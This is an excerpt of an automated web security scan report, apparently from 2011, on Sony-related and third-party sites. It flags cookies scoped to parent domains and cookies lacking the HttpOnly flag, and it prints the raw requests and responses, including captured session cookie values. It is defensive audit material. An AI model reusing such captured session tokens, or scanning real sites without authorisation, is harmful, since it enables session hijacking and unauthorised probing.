P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=0jlvl41706mcf&b=3&s=ij; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:43 GMT; path=/; domain=.flickr.com
X-Served-By: www56.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82289

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...

5.8. http://www.flickr.com/groups/sonycameraclub/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /groups/sonycameraclub/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=7i1m6g1706mce&b=3&s=ot; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:42 GMT; path=/; domain=.flickr.com
X-Served-By: www108.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82290

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...

6. Cookie without HttpOnly flag set
There are 30 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



6.1. http://security.symantec.com/default.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://security.symantec.com
Path:   /default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 23 Jun 2011 15:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: sscv6/default.asp?langid=ie&venid=sym
Content-Length: 162
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACBQSBBB=ECNBPACEOEDIAKNNLHFILIEL; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="sscv6/default.asp?langid=ie&amp;venid=sym">here</a>.</body>

6.2. https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://servicesales.sel.sony.com
Path:   /ecom/accessories/web/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ecom/accessories/web/index.jsp HTTP/1.1
Host: servicesales.sel.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:25 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001hzt8DTIMlpyDNOhXRLF_ba5:2TPPETS20Q; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: TSeca4d8=c2e2e546d60a79171a338a04613adb2bd67db16442c902964e03597d60ac0ec5c9f27c41; Path=/
Content-Length: 46207


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
   <title>Sony Parts and Accessories - Home</title>
   <meta http-equiv="
...[SNIP]...

6.3. http://solutions.liveperson.com/ref/lppb.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 23 Jun 2011 15:19:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: pbl.asp
Content-Length: 128
Content-Type: text/html
Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQQCBBCCB=EODHGDPDEDEKKABJJNKILEHB; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>

6.4. http://sony.storagesupport.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sony.storagesupport.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: sony.storagesupport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:26 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.14
Set-Cookie: SESS07abab826d851e77aee85522c6254c88=pjlp1vcvskl9vjmc6g84i02ts4; path=/; domain=.sony.storagesupport.com
Last-Modified: Thu, 23 Jun 2011 12:19:52 GMT
ETag: "d12054ab983693ed6c320fe9a9750c64"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8967

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sony Storage Support
...[SNIP]...

6.5. http://www.docs.sony.com/reflib/docget.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.docs.sony.com
Path:   /reflib/docget.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reflib/docget.asp HTTP/1.1
Host: www.docs.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jun 2011 15:09:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 79
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSTSQSCR=PFCCABKBJDOBFNKNEPFEAPOM; path=/
Cache-control: private

<center><font color=red><b>ERROR:</b> Invalid Document Provided</font></center>

6.6. http://www.docs.sony.com/startchat.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.docs.sony.com
Path:   /startchat.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /startchat.asp HTTP/1.1
Host: www.docs.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jun 2011 15:09:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6969
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSTSQSCR=FGCCABKBIDKABCNODCECHCGC; path=/
Cache-control: private


<HTML>
   <HEAD>
       <TITLE>Sony eSupport Live Chat Support</TITLE>
       <SCRIPT language="javascript">
       function openTrademarkLink(){window.open('http://products.sel.sony.com/SEL/legal/notice.html','
...[SNIP]...

6.7. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:48 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6il6pfh1t07e7jh9gcmfdeis73; expires=Sat, 16-Jul-2011 18:53:08 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 23 Jun 2011 15:16:06 GMT
ETag: "73be9325b7928055d2f550e7dc22f698"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

6.8. http://www.sonycreativesoftware.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sonycreativesoftware.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.sonycreativesoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 36816
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: theme=country=EN&currency=USD&name=DEFAULT&keycode=&lang=ENU; path=/
Set-Cookie: ASPSESSIONIDQQDADTAB=GGCJBNHBDLCBILOMJEKPBHEP; path=/
Date: Thu, 23 Jun 2011 15:19:55 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
   <head>
   <meta http-equiv="content-language" content="en-us"/>
   <title>
...[SNIP]...

6.9. http://sales.liveperson.net/hc/71737897/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71737897/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/71737897/?&site=71737897&cmd=mTagUrl&lpCallId=447454077424-753562085563&protV=20&lpjson=1&SV%21impression-query-name=chat-sonystyle-sales-general-english&SV%21impression-query-room=chat-sonystyle-sales-general-english&id=4900462531&info=button-impression%3Achat-sonystyle-sales-general-english%28Sony%20Store%20USA%20%7C%20Sony%20VAIO%AE%20Computers%20%7C%20Sony%20Consumer%20Electronics%29&waitForVisitor=true&d=1308841110550&page=http%3A//sales.liveperson.net/hcp/width/img40.gif HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:58:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 23 Jun 2011 14:58:31 GMT
Set-Cookie: HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 119

lpConnLib.Process({"ResultSet": {"lpCallId":"447454077424-753562085563","lpCallConfirm":"","lpData":[{"result":80}]}});

6.10. http://sony.tcliveus.com/i

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sony.tcliveus.com
Path:   /i

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i?siteID=501&ts=1308842184775&location=http%3A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FStoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551%26XID%3DM%3Asidenav%3Aesupport%26%26pageName%3DSony%2520Store%26g%3Dhttp%253A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FStoreCatalogDisplay%253FlangId%253D-1%2526storeId%253D10151%2526catalogId%253D10551%2526XID%253DM%253Asidenav%253Aesupport%26v0%3DM%253Asidenav%253Aesupport%26h1%3DSony%2520Store%26c3%3DStoreCatalogDisplay%26c6%3DSony%2520Store_%26c19%3DM%253Asidenav%253Aesupport%26v19%3DM%253Asidenav%253Aesupport%26v22%3DM%253Asidenav%253Aesupport%26v23%3DUnited%2520States%2520English%26c27%3DSony%2520Store%2520-%2520Control%26v27%3DSony%2520Store%2520-%2520Control%26v42%3DOther%26v43%3DOther%26v44%3DOther&tagv=5.3&tz=-300&r=empty&title=Sony%20Store%20USA%20%7C%20Sony%20VAIO%C2%AE%20Computers%20%7C%20Sony%20Consumer%20Electronics&cd=32&ah=1156&aw=1920&sh=1200&sw=1920&pd=32 HTTP/1.1
Host: sony.tcliveus.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=0007b036-7b3b-8256-99e6-bc8d00000050; NSC_Tpo`=445b326b7863

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE"
Connection: Keep-Alive
Content-Length: 43
Last-Modified: Thu, 23 Jun 2011 15:16:26 GMT
Content-Type: image/gif
Date: Thu, 23 Jun 2011 15:16:26 GMT
Set-Cookie: NSC_Tpo`=445b326b7863;expires=Thu, 23-Jun-11 19:16:25 GMT;path=/

GIF89a.............!.......,............Q.;

6.11. http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sonyelectronicssupportus.112.2o7.net
Path:   /b/ss/esupport-sony-dev/1/H.10--NS/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/esupport-sony-dev/1/H.10--NS/0 HTTP/1.1
Host: sonyelectronicssupportus.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:26 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597E[CE]; Expires=Tue, 21 Jun 2016 15:19:26 GMT; Domain=.2o7.net; Path=/
Location: http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:26 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www495
Content-Length: 0
Content-Type: text/plain
Connection: close


6.12. https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sonyelectronicssupportus.112.2o7.net
Path:   /b/ss/esupport-sony-dev/1/H.10--NS/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/esupport-sony-dev/1/H.10--NS/0 HTTP/1.1
Host: sonyelectronicssupportus.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:27 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597F[CE]; Expires=Tue, 21 Jun 2016 15:19:27 GMT; Domain=.2o7.net; Path=/
Location: https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:27 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:27 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www495
Content-Length: 0
Content-Type: text/plain
Connection: close


6.13. https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sonysscom.112.2o7.net
Path:   /b/ss/sonysscom/1/H.8--NS/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/sonysscom/1/H.8--NS/0 HTTP/1.1
Host: sonysscom.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:28 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_zfgpzzjfd=[CS]v4|0-0|4E035980[CE]; Expires=Tue, 21 Jun 2016 15:19:28 GMT; Domain=.2o7.net; Path=/
Location: https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:28 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:28 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www430
Content-Length: 0
Content-Type: text/plain
Connection: close


6.14. http://twitter.com/sonyoutletusa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /sonyoutletusa

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sonyoutletusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308842373-2439-32037
ETag: "face9414ffcb37b56c235fd4a36ddf88"
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 23 Jun 2011 15:19:33 GMT
X-Runtime: 0.00853
Content-Type: text/html; charset=utf-8
Content-Length: 19872
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 2a867da6018348b9ab53639033d7a20fdada72a0
Set-Cookie: k=173.193.214.243.1308842373290278; path=/; expires=Thu, 30-Jun-11 15:19:33 GMT; domain=.twitter.com
Set-Cookie: guest_id=130884237329990406; path=/; expires=Sat, 23 Jul 2011 15:19:33 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLWwFb0wAToHaWQiJTJhY2JhYzVmNTU0YjJj%250AYmZhNWMyNDRmNDVkODk5OGIwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8c7fe27671279233551b5c47933be7b27d397a15; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

6.15. http://us.playstation.com/psn/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.playstation.com
Path:   /psn/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /psn/ HTTP/1.1
Host: us.playstation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:34 GMT
Server: Apache
Last-Modified: Wed, 08 Jun 2011 20:21:19 GMT
ETag: "b2058a-f02f-4a539144aadc0"
Accept-Ranges: bytes
Content-Length: 61487
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: SONYCOOKIE1=2741283008.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">    <head><meta http-equi
...[SNIP]...

6.16. http://www.facebook.com/sonyelectronics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sonyelectronics

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sonyelectronics HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=jVkDTsgSBkZEpRPRjIw6e36G; expires=Sat, 22-Jun-2013 15:19:41 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=rLE1G; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.37
Connection: close
Date: Thu, 23 Jun 2011 15:19:41 GMT
Content-Length: 169018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema
...[SNIP]...

6.17. http://www.flickr.com/groups/sonycameraclub

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /groups/sonycameraclub HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=0jlvl41706mcf&b=3&s=ij; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:43 GMT; path=/; domain=.flickr.com
X-Served-By: www56.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82289

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...

6.18. http://www.flickr.com/groups/sonycameraclub/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /groups/sonycameraclub/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=7i1m6g1706mce&b=3&s=ot; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:42 GMT; path=/; domain=.flickr.com
X-Served-By: www108.flickr.mud.yahoo.com
Cache-Control: private
